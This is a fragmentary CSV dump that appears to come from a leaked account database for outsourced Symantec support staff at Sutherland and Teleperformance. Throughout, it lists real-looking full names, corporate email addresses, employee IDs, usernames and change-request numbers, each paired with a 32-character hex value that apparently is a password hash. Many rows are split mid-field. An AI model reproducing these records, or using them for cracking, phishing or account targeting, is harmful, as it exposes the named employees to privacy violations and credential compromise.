bfe68289be16979651976578646e6,K,<blank>,Nimesh_K_Khiara,Nimesh,NULL,NULL,NULL
e4c8-413d-849f-47935b3a2b5c,<blank>,<blank>,accounts@symantec.teleperformance.gr
,CRQ000000235345 - PR - 4/7/2011,4d5223b57461cb369c3d89e27863ec28,Pakou,<blank>,
114628,Eleni ,NULL,NULL,NULL
a91-4544-a8d3-6aba5603917a,<blank>,<blank>,Nithya_U@SUTH.COM,Sutherland,2f07cb1a
1376db2ec1f6a98a9462afc8,Udayakumar,<blank>,Nithya_Udayakumar,Nithya,NULL,NULL,N
ULL
650-442c-bbe3-e9a79dac0521,<blank>,<blank>,NitinJacob_Jacob@SUTH.COM,Sutherland,
5be93a62ae3953715ecc3e5758ab924b,Jacob,<blank>,Nitin_Jacob_Jacob,Nitin,NULL,NULL
,NULL
f7ce-4053-a24e-2085788fd438,CRQ000000236199-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,427bca996050de489f6324f8467d328f,Dumalagan,<blank>,114788
,Shalom,NULL,NULL,NULL
8bff-4a0f-a243-e8d81e0d2472,CRQ000000236180-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,c85299c6065a929200e062c3f95929db,Esteban,<blank>,114789,R
ichard,NULL,NULL,NULL
d6e-4c64-b33a-8343b927feb1,<blank>,<blank>,Obeid_Hussain@SUTH.COM,Sutherland,a5a
d4c5cc51b96d26ec0234b647f0546,Zakir,<blank>,Obeid_Zakir_Hussain,Obeid,NULL,NULL,
NULL
4f8-4904-962a-48023d1eeb7d,<blank>,<blank>,Padmachandran_V@SUTH.COM,Sutherland,3
f1b85b616f55e58d83f7c01f948a2b8,V,<blank>,Padmachandran_V,Padmachandran,NULL,NUL
L,NULL
0dd-475d-abe8-1f8abe717cb1,<blank>,<blank>,PalaniKumar_E@SUTH.COM,Sutherland,9fb
417e23c290cf185a62dbc7978e647,Kumar,<blank>,Palani_Kumar_E,Palani,NULL,NULL,NULL
cdb-4e59-8b3f-d7991542264a,<blank>,<blank>,Palanivel_Raja@suth.com,Sutherland,5c
e37bd537c4a3b7a71ae9677dfb6c68,Raja,<blank>,Palanivelraja_Raja,Palanivelraja,NUL
L,NULL,NULL
dfa-4eee-aec1-7a5b80f4c4db,<blank>,<blank>,Pallav_Thakar@suth.com,Sutherland,83b
3cc0fbd664849a719aff945765c5c,Dipak,<blank>,Pallav_Dipak_Thakar,Pallav,NULL,NULL
,NULL
9a5-4c66-813f-8315283fe17c,<blank>,<blank>,Parag_Muley@SUTH.COM,Sutherland,a8a57
0472749d74af40eb9280153c150,Diwakar,<blank>,Parag_Diwakar_Muley,Parag,NULL,NULL,
NULL
32d-4575-9c59-805baf76b633,<blank>,<blank>,Parag_Patange@SUTH.COM,Sutherland,324
43bb3822e6b6d7a761bbb8c9c4183,Prabhakar,<blank>,Parag_Prabhakar_Patange,Parag,NU
LL,NULL,NULL
8eb-40fc-874d-a483d0b163db,<blank>,<blank>,Poonguzhali_Arunai@suth.com,Sutherlan
d,7fc8aa5fdc9da5c21b4b40e701af8d28,Arunai,<blank>,Poonguzhali_Arunai,Poonguzhali
,NULL,NULL,NULL
9c61-44fb-95c9-df0a8db1abdd,CRQ000000236188,000-000,tools_id@symantec.suth.com,S
utherland,af06adb9b897202d3a15899aebee9060,Fernandez,<blank>,114790,Aybe,NULL,NU
LL,NULL
4e29-4724-b66a-a103cc2e0d8d,CRQ000000272493--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,d12c917e295be99c9fba8f3eee511065,Guansing,<blank>,116
898,Albert Nobleza,NULL,NULL,NULL
ee3-451a-ad99-9b11c663970e,<blank>,<blank>,PrabathS_Nair2@SUTH.COM,Sutherland,b6
330326739560bcda1c29d2b28d38af,S,<blank>,Prabath_S_Nair,Prabath,NULL,NULL,NULL
cdd-40a2-964c-5b5252f4df66,<blank>,<blank>,Prabhu_P2@SUTH.COM,Sutherland,756c145
84dcc8adc0b56feeb1f80a612,P,<blank>,Prabhu_P,Prabhu,NULL,NULL,NULL
303-426a-b7c4-aa8697553ab1,<blank>,<blank>,Nijesh_Chandran@SUTH.COM,Sutherland,7
3da740d940e0c394bb5b1fc729f493f,Chandran,<blank>,Nijesh_Chandran,Nijesh,NULL,NUL
L,NULL
a12-40fe-b1d1-9f8a083f74a0,<blank>,<blank>,Nithin_Sabu@SUTH.COM,Sutherland,061cf
60e99e90c80fa4342ecbe5353b5,Sabu,<blank>,Nithin_Sabu,Nithin,NULL,NULL,NULL
7f6-4ad9-93ec-90f02f02602b,<blank>,<blank>,BMPraja1@suth.com,Sutherland,0ce476ac
633a64e4aabaf3c624edf2c9,Manohar,<blank>,Prajakta_Manohar_Batwar,Prajakta,NULL,N
ULL,NULL
226-4a37-aafa-b8c0073930e5,<blank>,<blank>,Prajyot_lama@suth.com,Sutherland,bbb2
88e26d93217fa2779d9142c54346,Lama,<blank>,Prajyot_Lama,Prajyot,NULL,NULL,NULL
55f-4cb7-89b9-9a9c27438fe9,<blank>,<blank>,Pramod_Mathew@SUTH.COM,Sutherland,df4
362b57ce6d5cb124d6a310249bfbd,Mathew,<blank>,Pramod_Mathew,Pramod,NULL,NULL,NULL
c3f-467a-b860-b142e0c55645,<blank>,<blank>,Pranav_Karnik@SUTH.COM,Sutherland,c00
59206fb7a747b1b9f7c7613f55ce0,Suhas,<blank>,Pranav_Suhas_Karnik,Pranav,NULL,NULL
,NULL
298-4c2e-828a-8717ca6c16c6,19/04/2010 - SPJ,INC000000155088,nh.symantec@teleperf
ormance.com.ar,Teleperformance,d0735033977a639e7f7816fcf0ff9b26,Morello,<blank>,
092062,Dario,NULL,NULL,NULL
675-4c4d-b090-0c5e19a4ed07,<blank>,<blank>,PranilManohar_Phate@SUTH.COM,Sutherla
nd,0c68a5ed181b0da6901dfd3d35dfd9d2,Manohar,<blank>,Pranil_Manohar_Phate,Pranil,
NULL,NULL,NULL
6f7-40b7-a00d-9e374f5fc930,<blank>,<blank>,Prasad_Jadhav@SUTH.COM,Sutherland,011
3ae8fea58c3ce45c828863f3dbe47,Dinkar,<blank>,Prasad_Dinkar_Jadhav,Prasad,NULL,NU
LL,NULL
73b-4f06-b5ec-f90c06750291,<blank>,<blank>,PrasadGurunath_Kulkarni@SUTH.COM,Suth
erland,f38e626b97b4e0de11f6c463ffd71e16,Gurunath,<blank>,Prasad_Gurunath_Kulkarn
i,Prasad,NULL,NULL,NULL
c30-4d45-bc57-8c9cc4ff808b,<blank>,<blank>,Prasana_Nayak@SUTH.COM,Sutherland,8c6
c1f603dd08065ea8603a91487f503,Kumar,<blank>,Prasana_Kumar_Nayak,Prasana,NULL,NUL
L,NULL
9d5-405e-be21-f2115561e0f0,<blank>,<blank>,Prasanth_C@SUTH.COM,Sutherland,a2b1db
5d778de850591067c8a8dac4b8,C,<blank>,Prasanth_C,Prasanth,NULL,NULL,NULL
e81-4f9b-b489-77ea636dc749,<blank>,<blank>,PrasanthKumar_G@SUTH.COM,Sutherland,8
d980ba2236f1160d4be4cc6d29ad13a,Kumar,<blank>,Prasanth_Kumar_G,Prasanth,NULL,NUL
L,NULL
f67-43d7-ac1c-1460024f0c5d,<blank>,<blank>,Prasanth_V@SUTH.COM,Sutherland,bf8ec7
17832a3b44325ced17a24c67c0,V,<blank>,Prasanth_V,Prasanth,NULL,NULL,NULL
cde-4456-aade-d7182b941fde,<blank>,<blank>,Prasath_P1@SUTH.COM,Sutherland,2473c0
a7daed1689ff7e93efdfef1a32,P,<blank>,Prasath_P,Prasath,NULL,NULL,NULL
9ba2-4a18-8e31-65145533e931,01/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,d23ce8dabb21d9e0e0cb71112e82387b,Joseph,<blank>,100045,Ajith,NULL,NULL
,NULL
b35-4404-a9d2-492e8330128f,<blank>,<blank>,Prashant_Pandey1@SUTH.COM,Sutherland,
8a86575167a87e1721ee0cf8967d566e,Panchanand,<blank>,Prashant_Panchanand_Pandey,P
rashant,NULL,NULL,NULL
39f-4fe5-bab4-c846022b0815,<blank>,<blank>,Prashant_Mehta@SUTH.COM,Sutherland,c6
956cfcfb680b1bde0f85fc7d03a76b,Rajendra,<blank>,Prashant_Rajendra_Mehta,Prashant
,NULL,NULL,NULL
fce-424a-bb96-550aeeb271c0,<blank>,<blank>,Prashant_Amruthkar@SUTH.COM,Sutherlan
d,89f0179b51ffe8dbd28c7921b3dbd1a2,Ramesh,<blank>,Prashant_Ramesh_Amruthkar,Pras
hant,NULL,NULL,NULL
95e-4854-9fc5-500be0530dd8,<blank>,<blank>,Prashanth_Ruttula@suth.com,Sutherland
,e8e686a984ccb7a961fcd921ee961898,Ruttula,<blank>,Prashanth_Ruttula,Prashanth,NU
LL,NULL,NULL
5c3-40d3-9ac1-d8ddbca8bbdc,<blank>,<blank>,Prashobh_Balakrishnan@SUTH.COM,Suther
land,d87e5ed3176cdaa681cec32f96d2f5b7,Balakrishnan,<blank>,Prashobh_Balakrishnan
,Prashobh,NULL,NULL,NULL
5f6-4b93-988e-abd078b39814,<blank>,<blank>,Prasobh_K@SUTH.COM,Sutherland,fe9e966
78d86d8deaf6b29bc32724ecd,K,<blank>,Prasobh_K,Prasobh,NULL,NULL,NULL
46b-4acf-9aa8-4aff1a31ca4e,<blank>,<blank>,Prassanth_L@SUTH.COM,Sutherland,55a52
b910d87c93b44d7fa3d3a0a4219,L,<blank>,Prassanth_L,Prassanth,NULL,NULL,NULL
910-477c-818d-37afc165df8c,<blank>,<blank>,PraveenSamuel_J@SUTH.COM,Sutherland,1
2dbd05acc6824aedaa204e4cae4bb1b,Samuel,<blank>,Praveen_Samuel_J,Praveen,NULL,NUL
L,NULL
342-4247-988b-cd5153e9444a,<blank>,<blank>,Praveen_VP@SUTH.COM,Sutherland,ed5ddb
8f970f07eacdfeb05baa9fad0e,V,<blank>,Praveen_V_P,Praveen,NULL,NULL,NULL
b19-43e2-860c-1902f758b77d,<blank>,<blank>,PravinMahadev_Pawar@SUTH.COM,Sutherla
nd,56aa770a9832fda4f966a28ee4527de1,Mahadev,<blank>,Pravin_Mahadev_Pawar,Pravin,
NULL,NULL,NULL
0f6-494a-a256-72a783d02769,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,aaca5251e47754b0483c4f0c08a88354,Louis,<blank>,Princely_Louis_Noble_Prakash,Pri
ncely,NULL,NULL,NULL
3c5-4071-a97b-061f9dbacc54,<blank>,<blank>,LDPriti@suth.com,Sutherland,cd31660b0
8216fce590f82f231604960,Deepak,<blank>,Priti_Deepak_Labde,Priti,NULL,NULL,NULL
c99-4e6f-8829-d353166c2f02,<blank>,<blank>,Prity_Rajendran@SUTH.COM,Sutherland,2
a8c6c9c7c71fc004f1d5ef8aeacaf35,Rajendran,<blank>,Prity_Rajendran,Prity,NULL,NUL
L,NULL
a98-4e86-bb5a-babc93d845fa,<blank>,<blank>,PriyaA_A@SUTH.COM,Sutherland,b25ea781
c91db6d40c5436dc2b81498a,A,<blank>,Priya_A,Priya,NULL,NULL,NULL
c6d-4f64-91b1-24ebc5e87884,<blank>,<blank>,Nini_PV@SUTH.COM,Sutherland,53a837b52
75dd72ad6ff3850a91dafc5,P,<blank>,Nini_P_V,Nini,NULL,NULL,NULL
0b4-422b-88d4-fba352b2d2f7,<blank>,<blank>,Niranjan_K@SUTH.COM,Sutherland,ead6a3
923c728b9070f4bba11d6acbd3,K,<blank>,Niranjan_K,Niranjan,NULL,NULL,NULL
407-46ba-b8b6-c2da8655b26b,<blank>,<blank>,Niranjan_Kamat@SUTH.COM,Sutherland,7b
29357798cd7f88ee645eb3c845afd5,Manohar,<blank>,Niranjan_Manohar_Kamat,Niranjan,N
ULL,NULL,NULL
4fd3-4030-a57f-e58b2652234e,CRQ000000260479,<blank>,tools_id@symantecsuth.com,"M
Ay 19,2011 SP",7b24a1686125b440077ecb7f993a6a7f,Sravani,<blank>,115802,Kothapall
i,NULL,NULL,NULL
eb3-4f0c-a37c-89d8743c844a,<blank>,<blank>,Niranjana_Balasekaran@SUTH.COM,Suther
land,79e8e187df9b1c058373528384984702,B,<blank>,Niranjana_B,Niranjana,NULL,NULL,
NULL
a65-4d5e-8ca1-87a48d06695a,<blank>,<blank>,Nirav_Thakker@SUTH.COM,Sutherland,033
5d9ac1addbb9ac74c9bea1720fbd4,Navin,<blank>,Nirav_Navin_Thakker,Nirav,NULL,NULL,
NULL
21b4-4f8e-b877-394d5e28aeeb,<blank>,<blank>,dennis_moilanen@teleperformance.com,
CT - 08/06/2012 - CRQ000000687730,9cbe75be551e02a2c5c66799db3aa841,Moilanen,<bla
nk>,226433,Dennis,NULL,NULL,NULL
6b1-464c-baef-c2dd1842bec8,<blank>,<blank>,Nirmalraj_KS@SUTH.COM,Sutherland,a138
f493598a22250a779e0f965eb300,K,<blank>,Nirmalraj_K_S,Nirmalraj,NULL,NULL,NULL
de4-43ec-9962-59e3f4bf145e,<blank>,<blank>,Nishant_S@SUTH.COM,Sutherland,3a4da17
72b6ada7f3abfc67f8dce36ed,Menon,<blank>,Nishant_Menon_S,Nishant,NULL,NULL,NULL
7ad-434f-af2f-1c3ffbb4736d,<blank>,<blank>,Nishant_Kosambi@SUTH.COM,Sutherland,5
11db3dd18d54e4103f298f8ff024b2c,Mukesh,<blank>,Nishant_Mukesh_Kosambi,Nishant,NU
LL,NULL,NULL
aa9-4030-9f44-14317aae6bc2,<blank>,<blank>,Nithin_Nair1@SUTH.COM,Sutherland,2901
dab74f71df61dd21efb625a9d3e3,S,<blank>,Nithin_S_Nair,Nithin,NULL,NULL,NULL
568f-4e4c-900b-9eb3b56910ba,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
606980 - PR - 27th March 2012,5f605541a5145234adaa43207d8ec446,Fernandes,<blank>
,223107,Antony,NULL,NULL,NULL
7bb-41a2-ab5f-2b435a644d64,<blank>,<blank>,Nitin_Gupta@SUTH.COM,Sutherland,9f4da
4e591e6d9a201321cd958c13807,Pramod,<blank>,Nitin_Pramod_Gupta,Nitin,NULL,NULL,NU
LL
d5f4-4a50-aa38-cbc77f9aeba5,CRQ000000439577--VMD--06/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,71c3b1f598a0681fcd7a92f9a48386a7,Bincay,<blank>,12278
5,Melissa Inutan,NULL,NULL,NULL
63a3-494c-a50a-6ee599b257fe,CRQ000000601593--vmd--22/03/2012,000-000,johnmichael
_arias@Suth.com,Sutherland,d4a18011a9e85c026696e3ed640618b8,Arias,<blank>,222598
,John Michael,NULL,NULL,NULL
fb83-42a7-b300-79d4c2369fda,CRQ000000601601--vmd--22/03/2012,000-000,sherma_asis
@Suth.com,Sutherland,414148ea7177f99f52d227ad4df3bfaa,Asis,<blank>,222599,Sherma
,NULL,NULL,NULL
4cc-48bd-adb7-15594610dff7,<blank>,<blank>,Novina_C@SUTH.COM,Sutherland,cb2c3d16
08354f6f364e1dc9990a05a8,Christopher,<blank>,Novina_Christopher,Novina,NULL,NULL
,NULL
6ffa-4bfa-b777-9444b25c622e,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
606983 - PR - 27th March 2012,247bad8d98534918bf39eaf5a9508584,Samson,<blank>,22
3108,Sands Stanley,NULL,NULL,NULL
a7e-4d3b-a9e3-469a3d1eb2fd,<blank>,<blank>,Omar_Iyer@SUTH.COM,Sutherland,f2f7a32
158523795ba9e85406fba60b3,Ramnath,<blank>,Omar_Ramnath_Iyer,Omar,NULL,NULL,NULL
e01-4738-ac0b-5477394f5b37,<blank>,86213,Tools_id@symantec.suth.com,Sutherland G
lobal Services,5aab5cb011b21d74cdaf04eb32302449,Choyyan Maroli,<blank>,roshanpra
kash_choyya,Roshanprakash,NULL,NULL,NULL
1b7-4c99-94eb-ed4373b839ca,<blank>,<blank>,PadamSonar_J@SUTH.COM,Sutherland,8012
f9b2ac9e75d484491edaaf337188,Sonar,<blank>,Padam_Sonar_J,Padam,NULL,NULL,NULL
0a2-4b96-904a-f6c6df1580b0,<blank>,<blank>,PadmaPriya_T@SUTH.COM,Sutherland,b5d8
0d4a7cc3d09fd34bb46804093a63,Priya,<blank>,Padma_Priya_T,Padma,NULL,NULL,NULL
8f1-4573-ac5b-fc89dcc7fa98,<blank>,<blank>,Pallavi_Takkar@SUTH.COM,Sutherland,39
7404e613a6c1061d40adc7bcc78086,Ghanashyam,<blank>,Pallavi_Ghanashyam_Takkar,Pall
avi,NULL,NULL,NULL
30c-49b2-896c-2d9af3e7f3d2,<blank>,<blank>,Palvinder_Sagar@SUTH.COM,Sutherland,2
5a18619fe57ba2a7765ea83195c1be7,Singh,<blank>,Palvinder_Singh_Sagar,Palvinder,NU
LL,NULL,NULL
dab-476c-8f6f-070dbae15df7,<blank>,<blank>,Pankaj_Faldu@SUTH.COM,Sutherland,53cc
54015b03abab038060de7dcf9c4e,Karsanbhai,<blank>,Pankaj_Karsanbhai_Faldu,Pankaj,N
ULL,NULL,NULL
527-4fec-943a-e26cc0b097ab,<blank>,<blank>,Pankaj_Khobragade@SUTH.COM,Sutherland
,720ec9de6c376fe0d1a59d800d7da24b,Khobragade,<blank>,Pankaj_Khobragade,Pankaj,NU
LL,NULL,NULL
69f-4319-a325-f49cf20722cd,<blank>,<blank>,Pichumani_N@SUTH.COM,Sutherland,b0371
556b9f1a6c83a87e62ec7cc52da,N,<blank>,Pichumani_N,Pichumani,NULL,NULL,NULL
849-41e8-88fd-5358ed603d85,<blank>,<blank>,Paul_Aby@SUTH.COM,Sutherland,54815586
ac50de600ecad67ca635b4f1,A,<blank>,Paul_A_Aby,Paul,NULL,NULL,NULL
ad6-448e-85ce-fd94e5b27871,<blank>,<blank>,PawanKumar_YVS@SUTH.COM,Sutherland,c9
9f2d7396f0dee1b99bd428b4ebbeb0,Kumar,<blank>,Pawan_Kumar_Y_V_S,Pawan,NULL,NULL,N
ULL
1a5-4b90-b57c-80468630ba9d,<blank>,<blank>,pearlin_churchill@suth.com,Sutherland
,5b5029fd2417080a57c57154bc20ab02,Prem,<blank>,Pearlin_Prem_Pandian_Churchill,Pe
arlin,NULL,NULL,NULL
a2f-492b-9a31-b5d8b390bd1b,<blank>,<blank>,PeterJoseph_Lurshay@SUTH.COM,Sutherla
nd,6ee7904bbf18863830baf6fbad2f91c6,Joseph,<blank>,Peter_Joseph_Lurshay,Peter,NU
LL,NULL,NULL
6a0-4d73-a3d7-691321d07782,<blank>,<blank>,PeterXavier_AM@SUTH.COM,Sutherland,d6
bab9b728a0c55cb80750f2a33a6962,Xavier,<blank>,Peter_Xavier_A_M,Peter,NULL,NULL,N
ULL
76b-42c7-b4ac-155c358ba2a5,<blank>,<blank>,PhiloShalini_L@SUTH.COM,Sutherland,70
7c6e7654ee58b01d327b706d2d4c98,Shalini,<blank>,Philo_Shalini_L,Philo,NULL,NULL,N
ULL
adb-4aef-a08b-57890f02a7f4,<blank>,<blank>,Piyush_Baburaj@SUTH.COM,Sutherland,98
d78235805b6f6984826d3220d7b749,Nair,<blank>,Piyush_Nair_Baburaj,Piyush,NULL,NULL
,NULL
0055-44ef-92f6-bbcb5fa6bbe6,CRQ000000653453 SP 8 May 2012,000-0000,arvind_subram
anian@symantec.suth.com,Sutherland,495742eb90bf01060ea07755ab778bfa,Subramanian,
<blank>,224423,Arvind,NULL,NULL,NULL
f7c-4606-bdfd-bdf80debaaff,<blank>,<blank>,Prabavathy_Udayakumar@suth.com,Suther
land,06f6bd2d52b886ccc6fc8cfb33534eb7,Udaya,<blank>,Prabavathy_Udaya_Kumar,Praba
vathy,NULL,NULL,NULL
af3-4d07-bbb4-f9f9ccca1d5b,<blank>,<blank>,Prabhakaran_Rajasekaran@suth.com,Suth
erland,953cda26f6d5694dd229d7f4ea7aea65,Rajasekaran,<blank>,Prabhakaran_Rajaseka
ran,Prabhakaran,NULL,NULL,NULL
3779-4447-9051-c60581bac866,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,c
feaf7dc1a7622e138faa30861260f57,Chekka,<blank>,089279,Karunalatha,NULL,NULL,NULL
c05-4a23-9061-e66ac887fa8b,<blank>,<blank>,Pradeep_Asalkar@SUTH.COM,Sutherland,3
93d7b5590cf4defe1ceebc960098ef8,Bhanudas,<blank>,Pradeep_Bhanudas_Asalkar,Pradee
p,NULL,NULL,NULL
0f8-4b61-8d6c-a13a1c989e3f,<blank>,<blank>,Pradeep_K@SUTH.COM,Sutherland,fedff6a
bc04371a07e73e4f02f5ea043,K,<blank>,Pradeep_K,Pradeep,NULL,NULL,NULL
f779-4e6d-af8a-61eaefe88945,CRQ000000200671,<blank>,tools_id@symantec.suth.com,A
DR-11/2/2011,9786455d14d2e7e6af9b4f676265816b,Scaria,<blank>,112939,Biju,NULL,NU
LL,NULL
ef47-439d-b50c-b2dd1915cace,<blank>,EMPROV,Tools_Id@Symantec.Suth.Com,Sutherland
,335f6109bb400f9ca88a04bba33eebdf,Pescasiosa,<blank>,083228,Renalyn Veladiez ,NU
LL,NULL,NULL
68fc-41f7-b7a3-3bf1f3830598,"CRQ000000669860 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,d247aa13e44829cfc639022400013ed6,Mansoori,<bla
nk>,225898,Zeeshan,NULL,NULL,NULL
23ba-4ad6-a37d-80f517c30e9c,<blank>,<blank>,eugene_bruan@SPI.COM,PM - 8/28/2012
- CRQ000000783717,be77796763a3491c77abbac0d16078a7,Bruan,<blank>,229463,Eugene,N
ULL,NULL,NULL
6ba-4a0e-a331-2f337a0acaf8,<blank>,<blank>,Pradeep_Singh@SUTH.COM,Sutherland,334
fb9833d38ac8506826ed4c975e8be,Rajdev,<blank>,Pradeep_Rajdev_Singh,Pradeep,NULL,N
ULL,NULL
f8c-48f9-b3b8-417022bdcd44,<blank>,<blank>,Pradeep_T2@SUTH.COM,Sutherland,0cf9b2
9ae2eec2a8f31a4c24d012e38b,Ruban,<blank>,Pradeep_Ruban_T,Pradeep,NULL,NULL,NULL
94c-475f-ada7-32e61cc65598,<blank>,<blank>,Pradeepa_M@SUTH.COM,Sutherland,0da3b4
bb14b8317fc4117644e64d641e,M,<blank>,Pradeepa_M,Pradeepa,NULL,NULL,NULL
6cc-4717-a3e7-377a1639c455,<blank>,<blank>,Pradeepa_N@SUTH.COM,Sutherland,43b3b8
874653718a2dd00a278556d747,N,<blank>,Pradeepa_N,Pradeepa,NULL,NULL,NULL
911-46dd-8fe5-821f3ba87ea9,<blank>,092056,nh.symantec@teleperformance.com.ar,<bl
ank>,4eb6962215d5ecbd4125d0725b6c1814,Toscano,<blank>,092056,Carlos,NULL,NULL,NU
LL
0e5-4be9-b7f4-cf7a879a25b9,<blank>,<blank>,PrakashJChugani_J@SUTH.COM,Sutherland
,e417e5f5c5c583b66aa3ec9e9d51a29e,J,<blank>,Prakash_J_Chugani_J,Prakash,NULL,NUL
L,NULL
b69-4dfc-a398-e7da22c77702,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,90e4d62df5d361cb9e3653aeca545b54,Manoharan,<blank>,Prakash_Manoharan,Prakash,NU
LL,NULL,NULL
772-4461-985a-ff52c8b3a187,<blank>,<blank>,prakash_premkumar@suth.com,Sutherland
,8bea2fcbca62a96d01e030d73cc528b9,Premkumar,<blank>,Prakash_Premkumar,Prakash,NU
LL,NULL,NULL
1cf-4eb1-8ef8-412721a36de6,<blank>,<blank>,Prasanthi_M@SUTH.COM,Sutherland,ee3b4
fd8cadbff9fad3136d18924c02b,M,<blank>,Prasanthi_M,Prasanthi,NULL,NULL,NULL
71c-4203-bf75-df01b37e5dda,<blank>,<blank>,Prashant_Dubey@SUTH.COM,Sutherland,e3
6c2e1398f52360ffd5e4bb03b9135a,Omkarnath,<blank>,Prashant_Omkarnath_Dubey,Prasha
nt,NULL,NULL,NULL
318-48b0-88bf-e73e9d265c92,<blank>,<blank>,prakash_swaminathan@suth.com,Sutherla
nd,73837d9caf5efa446dd7593774ca78d3,Swaminathan,<blank>,Prakash_Swaminathan,Prak
ash,NULL,NULL,NULL
0f0-42ec-9036-8ba025d4d860,<blank>,<blank>,Preetu_Singhal@SUTH.COM,Sutherland,07
3e9a356940096b763e3621b3b7253c,Singhal,<blank>,Preetu_Singhal,Preetu,NULL,NULL,N
ULL
7937-4313-bc39-e8187569eac6,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,f6c7bd9f7106c316279ffeea38e86dbc,Go,<blank>,085749,Benedick,NULL,NULL,NULL
439-4539-8cd6-1c0cfb2e472c,<blank>,<blank>,Prem_Sagar@suth.com,Sutherland,576600
289939ba8ab47fd42cf28dbb88,Sagar,<blank>,Prem_Sagar_Vidya_Sagar,Prem,NULL,NULL,N
ULL
02a7-4456-a835-06d02446d9eb,CRQ000000379086 SP 31 OCT 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,44c8b1735186ab2949c6956bfd846944,R,<blank>,121659,Neet
huKrishnan,NULL,NULL,NULL
8f54-4c5b-9289-cd0fb2405085,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,99d5dd917bd1c5cfbeb10949bfbca4a2,Ahamed,<blank>,fayyas_ahamed_cc,Fayyas ,
NULL,NULL,NULL
fd5d-46df-9f97-2ca3706360eb,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a158581128108bb90b1e3a92cf88efda,Camacam,<blank>,083128,Vincent,NULL,NULL,NULL
83e4-4bbc-a9fe-bc3490554349,"CRQ000000682553 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,3807484f04050bd66d76573e4b4148a9,Pande,<blank
>,226233,Mohd Juber,NULL,NULL,NULL
00a9-4c4f-be9c-2ec4bf27b111,PBP 24/02/2011,<blank>,tools_id@symantec.suth.com,Su
therland,81b0cd5398ccad299d3df5ab3d7d3243,Anwar,<blank>,089185,Syed,NULL,NULL,NU
LL
ac91-426c-b10d-12c764da4961,bpr-02-06-10,INC183144/INC185710,Tools_ID@Symantec.S
uth.com,Sutherland,958d60f5efac4a2b5ac8f248307c115c,Rajamanickam,<blank>,094945,
Manikandan,NULL,NULL,NULL
7b89-4fe2-b4cf-1165e41e1226,CRQ000000260529,<blank>,tools_id@symantecsuth.com,"M
ay 19,2011 SP",4e06ba20c6aa2006bdfe2c27a94cb3bb,Lalam,<blank>,115813,Hari,NULL,N
ULL,NULL
476-43c2-857e-d4e453366262,<blank>,<blank>,RahulChoraria_L@SUTH.COM,Sutherland,f
e470632bdb26a75ce614f17ea36142b,Choraria,<blank>,Rahul_Choraria_L,Rahul,NULL,NUL
L,NULL
9fd-4d17-a3b0-c4e9f4dfaf99,<blank>,<blank>,Rajalakshmi_R@SUTH.COM,Sutherland,10f
d42999e0c82b7a97f1772e32f1d2a,R,<blank>,Rajalakshmi_R,Rajalakshmi,NULL,NULL,NULL
efb-4cb4-9e22-64dcc05b9c5d,<blank>,2635069,tools_id@symantec.suth.com,Sutherland
,b4317f2620125b8ce5c517e01ae28c65,Radhakrishnan,<blank>,Rajeev_Radhakrishnan_Nai
r,Rajeev,NULL,NULL,NULL
183-482a-9392-448203802d37,<blank>,<blank>,Abhishek_Naik@suth.com,Sutherland,377
4cee59c70612ffca7da1c1c073c25,Vijay,<blank>,Abhishek_Vijay,Abhishek,NULL,NULL,NU
LL
8ee-4c83-8270-f436df5af68f,<blank>,<blank>,Abishek_Babu@SUTH.COM,Sutherland,988c
b6259557ccc6c80c25c030c3da87,Babu,<blank>,Abishek_Babu,Abishek,NULL,NULL,NULL
1c8-48e9-8d2b-00009432f8e2,<blank>,<blank>,Ajay_Sharma@suth.com,Sutherland,b1d08
76873fe6bdb37747e730b8d0000,Raj,<blank>,Ajay_Raj,Ajay,NULL,NULL,NULL
171-4a00-ade4-d6452b78a588,<blank>,<blank>,Arun_John@SUTH.COM,Sutherland,5529d4f
3d76b678435201d7ec32e2b93,P,<blank>,Arun_P_John,Arun,NULL,NULL,NULL
b11-4709-b208-30d0021fe576,<blank>,<blank>,Arun@suth.com,Sutherland,e020edd18a2d
3a86c64cf658639c718f,Pradeep,<blank>,Arun_Pradeep_karuppanan_Ramasamy,Arun,NULL,
NULL,NULL
a68-4ac6-8ff3-808839113397,<blank>,<blank>,Arun_R3@SUTH.COM,Sutherland,ce3e05587
62bde586c3bc89479ff9a97,R,<blank>,Arun_R,Arun,NULL,NULL,NULL
e2c-4849-a843-592fa9c128b5,<blank>,<blank>,arun_kum@suth.com,Sutherland,bc8324a6
f38d31b6883fd77b3a117f0b,R. Kum,<blank>,Arun_R_Kum,Arun,NULL,NULL,NULL
075-4921-9c96-2bd93de0d806,<blank>,<blank>,Arun_S4@SUTH.COM,Sutherland,c5fb52bcf
7af50b5d782352094964d78,Sivagnanam,<blank>,Arun_Sivagnanam,Arun,NULL,NULL,NULL
06ab-4e7d-ad63-a81a319026c6,CRQ000000603569--vmd--23/03/2012,<blank>,antoniojr_d
elapea@Suth.com,Sutherland,ce44f5d955d17343fc3f753671114120,DelaPea,<blank>,2226
60,AntonioJr,NULL,NULL,NULL
379-4ef9-be1e-e08639edddf8,<blank>,<blank>,Ashfaq_Chandiwala@SUTH.COM,Sutherland
,71f48edea27929ab4c397a6834854fc8,Abdul,<blank>,Ashfaq_Abdul_Razak_Chandiwala,As
hfaq,NULL,NULL,NULL
301-499a-a713-630e25839995,<blank>,<blank>,Balachandar_B@SUTH.COM,Sutherland,361
84a395a9833f9202c128493bc42c8,B,<blank>,Balachandar_B,Balachandar,NULL,NULL,NULL
bd4d-4576-8c34-5daf9087907f,CRQ000000261112,<blank>,tools_id@symantecsuth.com,"M
ay 19,2011 SP",c212f509af0ef8f89df83c36d8d098ee,Varigala,<blank>,115819,Swetha,N
ULL,NULL,NULL
